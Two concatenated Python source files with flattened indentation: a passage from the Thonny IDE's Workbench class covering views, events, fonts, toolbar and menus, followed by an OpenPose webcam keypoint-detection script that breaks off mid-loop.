self._menubar.add_cascade(label=label if label else name, menu=menu)
self._menus[name] = menu
if label:
self._menus[label] = menu
return self._menus[name]
def get_view(self, view_id: str, create: bool = True) -> tk.Widget:
if "instance" not in self._view_records[view_id]:
if not create:
raise RuntimeError("View %s not created" % view_id)
class_ = self._view_records[view_id]["class"]
location = self._view_records[view_id]["location"]
master = self._view_notebooks[location]
# create the view
view = class_(self) # View's master is workbench to allow making it maximized
view.position_key = self._view_records[view_id]["position_key"]
self._view_records[view_id]["instance"] = view
# create the view home_widget to be added into notebook
view.home_widget = ttk.Frame(master)
view.home_widget.columnconfigure(0, weight=1)
view.home_widget.rowconfigure(0, weight=1)
view.home_widget.maximizable_widget = view # type: ignore
view.home_widget.close = lambda: self.hide_view(view_id) # type: ignore
if hasattr(view, "position_key"):
view.home_widget.position_key = view.position_key # type: ignore
            # initially the view will be in its home_widget
view.grid(row=0, column=0, sticky=tk.NSEW, in_=view.home_widget)
view.hidden = True
return self._view_records[view_id]["instance"]
def get_editor_notebook(self) -> EditorNotebook:
assert self._editor_notebook is not None
return self._editor_notebook
def get_package_dir(self):
"""Returns thonny package directory"""
return os.path.dirname(sys.modules["thonny"].__file__)
def get_image(self, filename: str, tk_name: Optional[str] = None) -> tk.PhotoImage:
if filename in self._image_mapping_by_theme[self._current_theme_name]:
filename = self._image_mapping_by_theme[self._current_theme_name][filename]
if filename in self._default_image_mapping:
filename = self._default_image_mapping[filename]
# if path is relative then interpret it as living in res folder
if not os.path.isabs(filename):
filename = os.path.join(self.get_package_dir(), "res", filename)
if not os.path.exists(filename):
if os.path.exists(filename + ".png"):
filename = filename + ".png"
elif os.path.exists(filename + ".gif"):
filename = filename + ".gif"
# are there platform-specific variants?
plat_filename = filename[:-4] + "_" + platform.system() + ".png"
if os.path.exists(plat_filename):
filename = plat_filename
if self._scaling_factor >= 2.0:
scaled_filename = filename[:-4] + "_2x.png"
if os.path.exists(scaled_filename):
filename = scaled_filename
else:
img = tk.PhotoImage(file=filename)
                # can't use the zoom method, because it doesn't allow specifying a name
img2 = tk.PhotoImage(tk_name)
self.tk.call(
img2,
"copy",
img.name,
"-zoom",
int(self._scaling_factor),
int(self._scaling_factor),
)
self._images.add(img2)
return img2
img = tk.PhotoImage(tk_name, file=filename)
self._images.add(img)
return img
def show_view(self, view_id: str, set_focus: bool = True) -> Union[bool, tk.Widget]:
"""View must be already registered.
Args:
view_id: View class name
without package name (eg. 'ShellView') """
if view_id == "MainFileBrowser":
# Was renamed in 3.1.1
view_id = "FilesView"
# NB! Don't forget that view.home_widget is added to notebook, not view directly
# get or create
view = self.get_view(view_id)
notebook = view.home_widget.master # type: ignore
if hasattr(view, "before_show") and view.before_show() == False: # type: ignore
return False
if view.hidden: # type: ignore
notebook.insert(
"auto",
view.home_widget, # type: ignore
text=self._view_records[view_id]["label"],
)
view.hidden = False # type: ignore
if hasattr(view, "on_show"): # type: ignore
view.on_show()
# switch to the tab
notebook.select(view.home_widget) # type: ignore
# add focus
if set_focus:
view.focus_set()
self.set_option("view." + view_id + ".visible", True)
self.event_generate("ShowView", view=view, view_id=view_id)
return view
def hide_view(self, view_id: str) -> Union[bool, None]:
# NB! Don't forget that view.home_widget is added to notebook, not view directly
if "instance" in self._view_records[view_id]:
# TODO: handle the case, when view is maximized
view = self._view_records[view_id]["instance"]
if view.hidden:
return
if hasattr(view, "before_hide") and view.before_hide() == False:
return False
view.home_widget.master.forget(view.home_widget)
self.set_option("view." + view_id + ".visible", False)
self.event_generate("HideView", view=view, view_id=view_id)
view.hidden = True
return None
def event_generate(self, sequence: str, event: Optional[Record] = None, **kwargs) -> None:
"""Uses custom event handling when sequence doesn't start with <.
In this case arbitrary attributes can be added to the event.
Otherwise forwards the call to Tk's event_generate"""
# pylint: disable=arguments-differ
if sequence.startswith("<"):
assert event is None
tk.Tk.event_generate(self, sequence, **kwargs)
else:
if sequence in self._event_handlers:
if event is None:
event = WorkbenchEvent(sequence, **kwargs)
else:
event.update(kwargs)
# make a copy of handlers, so that event handler can remove itself
# from the registry during iteration
# (or new handlers can be added)
for handler in sorted(self._event_handlers[sequence].copy(), key=str):
try:
handler(event)
except Exception:
self.report_exception("Problem when handling '" + sequence + "'")
if not self._closing:
self._update_toolbar()
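    # Sketch of the two dispatch paths described in the docstring above
    # ("MyPluginEvent" is an illustrative custom event name):
    #   wb.event_generate("<<WorkbenchInitialized>>")  # starts with "<": forwarded to Tk
    #   wb.event_generate("MyPluginEvent", data=1)     # custom path: WorkbenchEvent handlers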
def bind(self, sequence: str, func: Callable, add: bool = None) -> None: # type: ignore
"""Uses custom event handling when sequence doesn't start with <.
Otherwise forwards the call to Tk's bind"""
# pylint: disable=signature-differs
if not add:
logging.warning(
"Workbench.bind({}, ..., add={}) -- did you really want to replace existing bindings?".format(
sequence, add
)
)
if sequence.startswith("<"):
tk.Tk.bind(self, sequence, func, add)
else:
if sequence not in self._event_handlers or not add:
self._event_handlers[sequence] = set()
self._event_handlers[sequence].add(func)
def unbind(self, sequence: str, func=None) -> None:
if sequence.startswith("<"):
tk.Tk.unbind(self, sequence, funcid=func)
else:
try:
self._event_handlers[sequence].remove(func)
except Exception:
logging.getLogger("thonny").exception(
"Can't remove binding for '%s' and '%s'", sequence, func
)
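    # A minimal sketch of the custom (non-"<...>") event flow implemented by
    # bind()/event_generate() above ("MyEvent", `payload` and the handler are
    # hypothetical, for illustration only):
    #
    #   def on_my_event(event):
    #       print(event.sequence, event.payload)
    #
    #   workbench.bind("MyEvent", on_my_event, add=True)
    #   workbench.event_generate("MyEvent", payload=42)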
def in_heap_mode(self) -> bool:
# TODO: add a separate command for enabling the heap mode
# untie the mode from HeapView
return self._configuration_manager.has_option("view.HeapView.visible") and self.get_option(
"view.HeapView.visible"
)
def in_debug_mode(self) -> bool:
return os.environ.get("THONNY_DEBUG", False) in [
"1",
1,
"True",
True,
"true",
] or self.get_option("general.debug_mode", False)
def _init_scaling(self) -> None:
self._default_scaling_factor = self.tk.call("tk", "scaling")
if self._default_scaling_factor > 10:
            # it may be infinity, e.g. in Fedora
self._default_scaling_factor = 1.33
scaling = self.get_option("general.scaling")
if scaling in ["default", "auto"]: # auto was used in 2.2b3
self._scaling_factor = self._default_scaling_factor
else:
self._scaling_factor = float(scaling)
MAC_SCALING_MODIFIER = 1.7
if running_on_mac_os():
self._scaling_factor *= MAC_SCALING_MODIFIER
self.tk.call("tk", "scaling", self._scaling_factor)
font_scaling_mode = self.get_option("general.font_scaling_mode")
if (
running_on_linux()
and font_scaling_mode in ["default", "extra"]
and scaling not in ["default", "auto"]
):
# update system fonts which are given in pixel sizes
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
                # According to the documentation, absolute values of negative font sizes
# should be interpreted as pixel sizes (not affected by "tk scaling")
# and positive values are point sizes, which are supposed to scale automatically
# http://www.tcl.tk/man/tcl8.6/TkCmd/font.htm#M26
# Unfortunately it seems that this cannot be relied on
# https://groups.google.com/forum/#!msg/comp.lang.tcl/ZpL6tq77M4M/GXImiV2INRQJ
# My experiments show that manually changing negative font sizes
# doesn't have any effect -- fonts keep their default size
# (Tested in Raspbian Stretch, Ubuntu 18.04 and Fedora 29)
# On the other hand positive sizes scale well (and they don't scale automatically)
# convert pixel sizes to point_size
if orig_size < 0:
orig_size = -orig_size / self._default_scaling_factor
# scale
scaled_size = round(
orig_size * (self._scaling_factor / self._default_scaling_factor)
)
f.configure(size=scaled_size)
elif running_on_mac_os() and scaling not in ["default", "auto"]:
# see http://wiki.tcl.tk/44444
# update system fonts
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
assert orig_size > 0
f.configure(size=int(orig_size * self._scaling_factor / MAC_SCALING_MODIFIER))
def update_fonts(self) -> None:
editor_font_size = self._guard_font_size(self.get_option("view.editor_font_size"))
editor_font_family = self.get_option("view.editor_font_family")
io_font_size = self._guard_font_size(self.get_option("view.io_font_size"))
io_font_family = self.get_option("view.io_font_family")
for io_name in [
"IOFont",
"BoldIOFont",
"UnderlineIOFont",
"ItalicIOFont",
"BoldItalicIOFont",
]:
tk_font.nametofont(io_name).configure(family=io_font_family, size=io_font_size)
try:
shell = self.get_view("ShellView", create=False)
except Exception:
# shell may be not created yet
pass
else:
shell.update_tabs()
tk_font.nametofont("EditorFont").configure(family=editor_font_family, size=editor_font_size)
tk_font.nametofont("SmallEditorFont").configure(
family=editor_font_family, size=editor_font_size - 2
)
tk_font.nametofont("BoldEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("ItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("BoldItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
if self.get_ui_mode() == "simple":
default_size_factor = max(0.7, 1 - (editor_font_size - 10) / 25)
small_size_factor = max(0.6, 0.8 - (editor_font_size - 10) / 25)
tk_font.nametofont("TkDefaultFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("TkHeadingFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("SmallLinkFont").configure(
size=round(editor_font_size * small_size_factor)
)
# Update Treeview font and row height
if running_on_mac_os():
treeview_font_size = int(editor_font_size * 0.7 + 4)
else:
treeview_font_size = int(editor_font_size * 0.7 + 2)
treeview_font = tk_font.nametofont("TreeviewFont")
treeview_font.configure(size=treeview_font_size)
rowheight = round(treeview_font.metrics("linespace") * 1.2)
style = ttk.Style()
style.configure("Treeview", rowheight=rowheight)
if self._editor_notebook is not None:
self._editor_notebook.update_appearance()
def _get_menu_index(self, menu: tk.Menu) -> int:
for i in range(len(self._menubar.winfo_children())):
if menu == self._menubar.winfo_children()[i]:
return i
raise RuntimeError("Couldn't find menu")
def _add_toolbar_button(
self,
command_id: str,
image: Optional[tk.PhotoImage],
command_label: str,
caption: str,
alternative_caption: str,
accelerator: Optional[str],
handler: Callable[[], None],
tester: Optional[Callable[[], bool]],
toolbar_group: int,
) -> None:
assert caption is not None and len(caption) > 0, (
"Missing caption for '%s'. Toolbar commands must have caption." % command_label
)
slaves = self._toolbar.grid_slaves(0, toolbar_group)
if len(slaves) == 0:
group_frame = ttk.Frame(self._toolbar)
if self.in_simple_mode():
padx = 0 # type: Union[int, Tuple[int, int]]
else:
padx = (0, 10)
group_frame.grid(row=0, column=toolbar_group, padx=padx)
else:
group_frame = slaves[0]
if self.in_simple_mode():
screen_width = self.winfo_screenwidth()
if screen_width >= 1280:
button_width = max(7, len(caption), len(alternative_caption))
elif screen_width >= 1024:
button_width = max(6, len(caption), len(alternative_caption))
else:
button_width = max(5, len(caption), len(alternative_caption))
else:
button_width = None
button = ttk.Button(
group_frame,
command=handler,
image=image,
style="Toolbutton",
state=tk.NORMAL,
text=caption,
compound="top" if self.in_simple_mode() else None,
pad=(10, 0) if self.in_simple_mode() else None,
width=button_width,
)
button.pack(side=tk.LEFT)
button.tester = tester # type: ignore
tooltip_text = command_label
if self.get_ui_mode() != "simple":
if accelerator and lookup_style_option(
"OPTIONS", "shortcuts_in_tooltips", default=True
):
tooltip_text += " (" + accelerator + ")"
create_tooltip(button, tooltip_text)
self._toolbar_buttons[command_id] = button
def get_toolbar_button(self, command_id):
return self._toolbar_buttons[command_id]
def _update_toolbar(self) -> None:
if self._destroyed or not hasattr(self, "_toolbar"):
return
if self._toolbar.winfo_ismapped():
for group_frame in self._toolbar.grid_slaves(0):
for button in group_frame.pack_slaves():
                    if thonny._runner is None or (button.tester and not button.tester()):
button["state"] = tk.DISABLED
else:
button["state"] = tk.NORMAL
def _cmd_zoom_with_mouse(self, event) -> None:
if event.delta > 0:
self._change_font_size(1)
else:
self._change_font_size(-1)
def _toggle_font_size(self) -> None:
current_size = self.get_option("view.editor_font_size")
if self.winfo_screenwidth() < 1024:
# assuming 32x32 icons
small_size = 10
medium_size = 12
large_size = 14
elif self.winfo_screenwidth() < 1280:
# assuming 32x32 icons
small_size = 12
medium_size = 14
large_size = 18
else:
small_size = 12
medium_size = 16
large_size = 20
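        # preferred window width (px) for each editor font size; used below to resize the window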
widths = {10: 800, 12: 1050, 14: 1200, 16: 1300, 18: 1400, 20: 1650}
if current_size < small_size or current_size >= large_size:
new_size = small_size
elif current_size < medium_size:
new_size = medium_size
else:
new_size = large_size
self._change_font_size(new_size - current_size)
new_width = min(widths[new_size], self.winfo_screenwidth())
geo = re.findall(r"\d+", self.wm_geometry())
self.geometry("{0}x{1}+{2}+{3}".format(new_width, geo[1], geo[2], geo[3]))
def _change_font_size(self, delta: int) -> None:
if delta != 0:
editor_font_size = self.get_option("view.editor_font_size")
editor_font_size += delta
self.set_option("view.editor_font_size", self._guard_font_size(editor_font_size))
io_font_size = self.get_option("view.io_font_size")
io_font_size += delta
self.set_option("view.io_font_size", self._guard_font_size(io_font_size))
self.update_fonts()
def _guard_font_size(self, size: int) -> int:
# https://bitbucket.org/plas/thonny/issues/164/negative-font-size-crashes-thonny
MIN_SIZE = 4
MAX_SIZE = 200
if size < MIN_SIZE:
return MIN_SIZE
elif size > MAX_SIZE:
return MAX_SIZE
else:
return size
def _check_update_window_width(self, delta: int) -> None:
if not ui_utils.get_zoomed(self):
self.update_idletasks()
# TODO: shift to left if right edge goes away from screen
# TODO: check with screen width
new_geometry = "{0}x{1}+{2}+{3}".format(
self.winfo_width() + delta, self.winfo_height(), self.winfo_x(), self.winfo_y()
)
self.geometry(new_geometry)
def _maximize_view(self, event=None) -> None:
if self._maximized_view is not None:
return
# find the widget that can be relocated
widget = self.focus_get()
if isinstance(widget, (EditorNotebook, AutomaticNotebook)):
current_tab = widget.get_current_child()
if current_tab is None:
return
if not hasattr(current_tab, "maximizable_widget"):
return
widget = current_tab.maximizable_widget
while widget is not None:
if hasattr(widget, "home_widget"):
# if widget is view, then widget.master is workbench
widget.grid(
row=1, column=0, sticky=tk.NSEW, in_=widget.master # type: ignore
)
# hide main_frame
self._main_frame.grid_forget()
self._maximized_view = widget
self.get_variable("view.maximize_view").set(True)
break
else:
widget = widget.master # type: ignore
def _unmaximize_view(self, event=None) -> None:
if self._maximized_view is None:
return
# restore main_frame
self._main_frame.grid(row=1, column=0, sticky=tk.NSEW, in_=self)
# put the maximized view back to its home_widget
self._maximized_view.grid(
row=0, column=0, sticky=tk.NSEW, in_=self._maximized_view.home_widget # type: ignore
)
self._maximized_view = None
self.get_variable("view.maximize_view").set(False)
def show_options(self, page_key=None):
dlg = ConfigurationDialog(self, self._configuration_pages)
if page_key:
dlg.select_page(page_key)
ui_utils.show_dialog(dlg)
def _cmd_focus_editor(self) -> None:
self.get_editor_notebook().focus_set()
def _cmd_focus_shell(self) -> None:
self.show_view("ShellView", True)
shell = get_shell()
# go to the end of any current input
shell.text.mark_set("insert", "end")
shell.text.see("insert")
def _cmd_toggle_full_screen(self) -> None:
"""
TODO: For mac
http://wiki.tcl.tk/44444
Switching a window to fullscreen mode
(Normal Difference)
To switch a window to fullscreen mode, the window must first be withdrawn.
# For Linux/Mac OS X:
set cfs [wm attributes $w -fullscreen]
if { $::tcl_platform(os) eq "Darwin" } {
if { $cfs == 0 } {
# optional: save the window geometry
set savevar [wm geometry $w]
}
wm withdraw $w
}
wm attributes $w -fullscreen [expr {1-$cfs}]
if { $::tcl_platform(os) eq "Darwin" } {
wm deiconify $w
if { $cfs == 1 } {
after idle [list wm geometry $w $savevar]
}
}
"""
var = self.get_variable("view.full_screen")
var.set(not var.get())
self.attributes("-fullscreen", var.get())
def _cmd_toggle_maximize_view(self) -> None:
if self._maximized_view is not None:
self._unmaximize_view()
else:
self._maximize_view()
def _update_menu(self, menu: tk.Menu, menu_name: str) -> None:
if menu.index("end") is None:
return
for i in range(menu.index("end") + 1):
item_data = menu.entryconfigure(i)
if "label" in item_data:
command_label = menu.entrycget(i, "label")
if (menu_name, command_label) not in self._menu_item_specs:
continue
tester = self._menu_item_specs[(menu_name, command_label)].tester
enabled = not tester
if tester:
try:
enabled = tester()
except Exception:
traceback.print_exc()
enabled = False
if enabled:
menu.entryconfigure(i, state=tk.NORMAL)
else:
menu.entryconfigure(i, state=tk.DISABLED)
def _find_location_for_menu_item(self, menu_name: str, command_label: str) -> Union[str, int]:
menu = self.get_menu(menu_name)
if menu.index("end") == None: # menu is empty
return "end"
specs = self._menu_item_specs[(menu_name, command_label)]
this_group_exists = False
for i in range(0, menu.index("end") + 1):
data = menu.entryconfigure(i)
if "label" in data:
# it's a command, not separator
sibling_label = menu.entrycget(i, "label")
sibling_group = self._menu_item_specs[(menu_name, sibling_label)].group
if sibling_group == specs.group:
this_group_exists = True
if specs.position_in_group == "alphabetic" and sibling_label > command_label:
return i
if sibling_group > specs.group:
assert (
not this_group_exists
) # otherwise we would have found the ending separator
menu.insert_separator(i)
return i
else:
# We found a separator
if this_group_exists:
# it must be the ending separator for this group
return i
# no group was bigger, ie. this should go to the end
if not this_group_exists:
menu.add_separator()
return "end"
def _poll_ipc_requests(self) -> None:
try:
if self._ipc_requests.empty():
return
while not self._ipc_requests.empty():
args = self._ipc_requests.get()
try:
for filename in args:
if os.path.isfile(filename):
self.get_editor_notebook().show_file(filename)
except Exception:
traceback.print_exc()
self.become_active_window()
finally:
self.after(50, self._poll_ipc_requests)
def _on_close(self) -> None:
if not self.get_editor_notebook().check_allow_closing():
return
self._closing = True
try:
self._save_layout()
self._editor_notebook.remember_open_files()
self.event_generate("WorkbenchClose")
self._configuration_manager.save()
except Exception:
self.report_exception()
self.destroy()
self._destroyed = True
def _on_all_key_presses(self, event):
if running_on_windows():
ui_utils.handle_mistreated_latin_shortcuts(self._latin_shortcuts, event)
def _on_focus_in(self, event):
if self._lost_focus:
self._lost_focus = False
self.event_generate("WindowFocusIn")
def _on_focus_out(self, event):
if self.focus_get() is None:
if not self._lost_focus:
self._lost_focus = True
self.event_generate("WindowFocusOut")
def focus_get(self) -> Optional[tk.Widget]:
try:
return tk.Tk.focus_get(self)
except Exception:
# This may give error in Ubuntu
return None
def destroy(self) -> None:
try:
if self._is_server() and os.path.exists(thonny.IPC_FILE):
os.remove(thonny.IPC_FILE)
self._closing = True
# Tk clipboard gets cleared on exit and won't end up in system clipboard
# https://bugs.python.org/issue1207592
# https://stackoverflow.com/questions/26321333/tkinter-in-python-3-4-on-windows-dont-post-internal-clipboard-data-to-the-windo
try:
clipboard_data = self.clipboard_get()
if len(clipboard_data) < 1000 and all(
map(os.path.exists, clipboard_data.splitlines())
):
# Looks like the clipboard contains file name(s)
# Most likely this means actual file cut/copy operation
# was made outside of Thonny.
# Don't want to replace this with simple string data of file names.
pass
else:
copy_to_clipboard(clipboard_data)
except Exception:
pass
except Exception:
logging.exception("Error while destroying workbench")
finally:
try:
super().destroy()
finally:
runner = get_runner()
                if runner is not None:
runner.destroy_backend()
def _on_configure(self, event) -> None:
# called when window is moved or resized
if (
hasattr(self, "_maximized_view") # configure may happen before the attribute is defined
and self._maximized_view # type: ignore
):
# grid again, otherwise it acts weird
self._maximized_view.grid(
row=1, column=0, sticky=tk.NSEW, in_=self._maximized_view.master # type: ignore
)
def _on_tk_exception(self, exc, val, tb) -> None:
# copied from tkinter.Tk.report_callback_exception with modifications
# see http://bugs.python.org/issue22384
sys.last_type = exc
sys.last_value = val
sys.last_traceback = tb
self.report_exception()
def report_exception(self, title: str = "Internal error") -> None:
logging.exception(title)
if tk._default_root and not self._closing: # type: ignore
(typ, value, _) = sys.exc_info()
assert typ is not None
if issubclass(typ, UserError):
msg = str(value)
else:
msg = traceback.format_exc()
dlg = ui_utils.LongTextDialog(title, msg, parent=self)
ui_utils.show_dialog(dlg, self)
def _open_views(self) -> None:
for nb_name in self._view_notebooks:
view_name = self.get_option("layout.notebook_" + nb_name + "_visible_view")
            if view_name is not None:
if view_name == "GlobalsView":
# was renamed in 2.2b5
view_name = "VariablesView"
if self.get_ui_mode() != "simple" or view_name in SIMPLE_MODE_VIEWS:
self.show_view(view_name)
# make sure VariablesView is at least loaded
# otherwise it may miss globals events
# and will show empty table on open
self.get_view("VariablesView")
if (
self.get_option("assistance.open_assistant_on_errors")
or self.get_option("assistance.open_assistant_on_warnings")
) and (self.get_ui_mode() != "simple" or "AssistantView" in SIMPLE_MODE_VIEWS):
self.get_view("AssistantView")
def _save_layout(self) -> None:
self.update_idletasks()
self.set_option("layout.zoomed", ui_utils.get_zoomed(self))
for nb_name in self._view_notebooks:
widget = self._view_notebooks[nb_name].get_visible_child()
if hasattr(widget, "maximizable_widget"):
view = widget.maximizable_widget
view_name = type(view).__name__
self.set_option("layout.notebook_" + nb_name + "_visible_view", view_name)
else:
self.set_option("layout.notebook_" + nb_name + "_visible_view", None)
if not ui_utils.get_zoomed(self) or running_on_mac_os():
# can't restore zoom on mac without setting actual dimensions
gparts = re.findall(r"\d+", self.wm_geometry())
self.set_option("layout.width", int(gparts[0]))
self.set_option("layout.height", int(gparts[1]))
self.set_option("layout.left", int(gparts[2]))
self.set_option("layout.top", int(gparts[3]))
self.set_option("layout.west_pw_width", self._west_pw.preferred_size_in_pw)
self.set_option("layout.east_pw_width", self._east_pw.preferred_size_in_pw)
for key in ["nw", "sw", "s", "se", "ne"]:
self.set_option(
"layout.%s_nb_height" % key, self._view_notebooks[key].preferred_size_in_pw
)
def update_title(self, event=None) -> None:
editor = self.get_editor_notebook().get_current_editor()
if self._is_portable:
title_text = "Portable Thonny"
else:
title_text = "Thonny"
        if editor is not None:
title_text += " - " + editor.get_long_description()
self.title(title_text)
def become_active_window(self, force=True) -> None:
# Looks like at least on Windows all following is required
# for ensuring the window gets focus
# (deiconify, ..., iconify, deiconify)
self.deiconify()
if force:
self.attributes("-topmost", True)
self.after_idle(self.attributes, "-topmost", False)
self.lift()
if not running_on_linux():
# http://stackoverflow.com/a/13867710/261181
self.iconify()
self.deiconify()
editor = self.get_editor_notebook().get_current_editor()
if editor is not None:
            # This method is meant to be called when a new file is opened, so it's safe to
# send the focus to the editor
editor.focus_set()
else:
self.focus_set()
def open_url(self, url):
m = re.match(r"^thonny-editor://(.*?)(#(\d+)(:(\d+))?)?$", url)
if m is not None:
filename = m.group(1).replace("%20", " ")
lineno = None if m.group(3) is None else int(m.group(3))
col_offset = None if m.group(5) is None else int(m.group(5))
if lineno is None:
self.get_editor_notebook().show_file(filename)
else:
self.get_editor_notebook().show_file_at_line(filename, lineno, col_offset)
return
m = re.match(r"^thonny-help://(.*?)(#(.+))?$", url)
if m is not None:
topic = m.group(1)
fragment = m.group(3)
self.show_view("HelpView").load_topic(topic, fragment)
return
if url.endswith(".rst") and not url.startswith("http"):
parts = url.split("#", maxsplit=1)
topic = parts[0][:-4]
if len(parts) == 2:
fragment = parts[1]
else:
fragment = None
self.show_view("HelpView").load_topic(topic, fragment)
return
# Fallback
webbrowser.open(url, False, True)
def open_help_topic(self, topic, fragment=None):
self.show_view("HelpView").load_topic(topic, fragment)
def bell(self, displayof=0):
if not self.get_option("general.disable_notification_sound"):
super().bell(displayof=displayof)
def _mac_quit(self, *args):
self._on_close()
def _is_server(self):
return self._ipc_requests is not None
def get_toolbar(self):
return self._toolbar
class WorkbenchEvent(Record):
def __init__(self, sequence: str, **kwargs) -> None:
Record.__init__(self, **kwargs)
self.sequence = sequence
|
Pose.py
|
# op class: uses OpenPose to analyze each video frame and extract body keypoint coordinates
import sys
import cv2
import os
from sys import platform
import argparse
#from tello import *
from UI import FPS, RollingGraph
from math import atan2, degrees, sqrt, pi
import numpy as np
import time
import gc
from multiprocessing import Process, Manager
#import profile
import random
# Import the OpenPose library
dir_path = os.path.dirname(os.path.realpath(__file__))
try:
if platform == "win32":
        # On Windows, load the OpenPose DLLs
        sys.path.append(dir_path+'./../python/openpose/Release')  # adjust to where the files live
        os.environ['path'] = os.environ['path'] + ';' + \
            dir_path + './../x64/Release;' + dir_path + './../bin;'
        # The paths above depend on where the openpose folder is located
import pyopenpose as op
else:
        # On non-Windows systems, use the Python bindings from the python folder
sys.path.append('../python')
from openpose import pyopenpose as op
except ImportError as e:
print('Error: OpenPose library could not be found. Did you enable `BUILD_PYTHON` in CMake and have this Python script in the right folder?')
raise e
def angle(A, B, C):
if A[0] is None or B[0] is None or C[0] is None:
return None
dg = degrees(atan2(C[1]-B[1], C[0]-B[0]) -
atan2(A[1]-B[1], A[0]-B[0])) % 360
if dg >= 180 and dg < 360:
dg = 360-dg
return dg
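# A quick sanity check for angle() (hypothetical points, not from the original
# script): the angle at vertex B=(0, 0) between A=(1, 0) and C=(0, 1) is a
# right angle, and any missing keypoint yields None.
#
#   >>> angle((1, 0), (0, 0), (0, 1))
#   90.0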
class Pose:
def __init__(self):
parser = argparse.ArgumentParser()
#parser.add_argument("--image_path", default="./media/COCO_val2014_000000000192.jpg", help="Process an image. Read all standard formats (jpg, png, bmp, etc.).")
args = parser.parse_known_args()
params = dict()
params["model_folder"] = './../models/' # 具体情况
params["number_people_max"] = 1
params["model_pose"] = "BODY_25"
# Add others in path?
for i in range(0, len(args[1])):
curr_item = args[1][i]
if i != len(args[1])-1:
next_item = args[1][i+1]
else:
next_item = "1"
if "--" in curr_item and "--" in next_item:
key = curr_item.replace('-', '')
if key not in params:
params[key] = "1"
elif "--" in curr_item and "--" not in next_item:
key = curr_item.replace('-', '')
if key not in params:
params[key] = next_item
        # Initialize OpenPose
self.opWrapper = op.WrapperPython()
self.opWrapper.configure(params)
self.opWrapper.start()
self.datum = op.Datum()
    def get_kp(self, frame):  # returns the keypoint coordinates as a 2D list
self.datum.cvInputData = frame
self.opWrapper.emplaceAndPop([self.datum])
        out = self.datum.cvOutputData  # pass the rendered frame out directly; no need to redraw with cv2
xy = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [
0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]
        # also record the frame brightness in list slot 10 (listid[10])
        brightness = self.framebrightness(frame)
try:
kps = self.datum.poseKeypoints[0]
# out=self.datum.cvOutputData
            listid = [0, 1, 2, 3, 4, 5, 6, 7, 8, 10,
                      15, 16, 17, 18]  # BODY_25 keypoint indices; slot 10 is reused for brightness
for i in listid:
x, y, conf = kps[i]
                if x != 0 or y != 0:  # one coordinate may be 0, but not both
xy[i][0] = int(x)
xy[i][1] = int(y)
else:
xy[i][0] = xy[i][1] = None
if i == 10:
xy[i][0] = xy[i][1] = brightness
except:
for i in range(19):
if i == 10:
xy[i][0] = xy[i][1] = brightness
else:
xy[i][0] = xy[i][1] = None
        return xy, out  # xy[i][k]: i is the keypoint index, k selects the coordinate (0=x, 1=y)
    def framebrightness(self, frame):  # estimate the frame brightness; returns a "press" flag
        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)  # convert to grayscale
per_image = []
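        # note: only the first pixel row (frame[0]) is sampled for the brightness mean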
per_image.append(np.mean(frame[0]))
brightness = np.mean(per_image)
        if brightness < 15:  # keep the threshold low; too sensitive and it triggers accidentally
press = 1
else:
press = 0
return press
def write(stack, imge) -> None:
top = 20
stack.append(imge)
if len(stack) >= top:
del stack[:]
gc.collect()
def read(stack) -> None:
fourcc = cv2.VideoWriter_fourcc(*'avc1')
out = cv2.VideoWriter('video_out'+str(time.time()) +
'.mp4', fourcc, 25, (640, 480))
while 1:
if len(stack) >= 10:
frame = stack.pop()
out.write(frame)
cv2.imshow("REC", frame)
key = cv2.waitKey(1) & 0xFF
if key == ord('c'):
break
else:
continue
out.release()
cv2.destroyAllWindows()
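# write()/read() form a small producer/consumer pair: write() appends frames to
# a Manager().list() shared across processes and wipes the buffer once it holds
# `top` frames, while read() runs in a separate process, popping frames into an
# .mp4 file and a preview window until 'c' is pressed.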
def runtest():
video = cv2.VideoCapture(0)
ispose = 1
isrec = 0
fps = FPS()
if ispose:
my_pose = Pose()
if isrec:
stack = Manager().list()
pr = Process(target=read, args=(stack,))
pr.start()
lspoint = []
roll = RollingGraph(thickness=[1], threshold=125, waitKey=False)
while True:
start_time = time.time()
ok, frame = video.read()
if not ok:
break
fps.update()
# frame=cv2.imread("./123.jpg")
frame2 = frame
# cv2.imshow("raw",frame)
if ispose:
show, out = my_pose.get_kp(frame)
# print(show[7])
# angle234=angle((show[2][0],show[2][1]),(show[3][0],show[3][1]),(show[4][0],show[4][1]))
# angle567=angle((show[7][0],show[7][1]),(show[6][0],show[6][1]),(show[5][0],show[5][1]))
# #if angle567:
# #print(str(angle234)+' '+str(angle567)+' '+str(show[10][0]))
# #else:
# # print('ooooops')
            if show[2][0]:  # checking one coordinate is enough
cv2.circle(out, (show[2][0], show[2][1]), 10, (0, 0, 255), -1)
if show[3][0]:
cv2.circle(out, (show[3][0], show[3][1]), 10, (0, 0, 255), -1)
if show[4][0]:
cv2.circle(out, (show[4][0], show[4][1]), 10, (0, 0, 255), -1)
            if show[5][0]:  # checking one coordinate is enough
cv2.circle(out, (show[5][0], show[5][1]), 10, (0, 0, 255), -1)
if show[6][0]:
cv2.circle(out, (show[6][0], show[6][1]), 10, (0, 0, 255), -1)
if show[7][0]:
cv2.circle(out, (show[7][0], show[7][1]), 10, (0, 0, 255), -1)
# if show[15][0] and show[15][1]:
# #cv2.circle(frame2, (show[0][0], show[0][1]), 35, (0, 0, 255), -1)
# if len(lspoint)>=30:
# lspoint.pop(0)
# lspoint.append([show[15][0],show[15][1]])
# for item in lspoint:
# coloris=(random.randint(0,255),random.randint(0,255),random.randint(0,255))
# #coloris=(255,255,255)
# cv2.circle(frame2,(item[0],item[1]),5,coloris,-1)
# if show[16][0] and show[16][1]:
# #cv2.circle(frame2, (show[0][0], show[0][1]), 35, (0, 0, 255), -1)
# if len(lspoint)>=30:
# lspoint.pop(0)
# lspoint.append([show[16][0],show[16][1]])
# for item in lspoint:
# coloris=(random.randint(0,255),random.randint(0,255),random.randint(0,255))
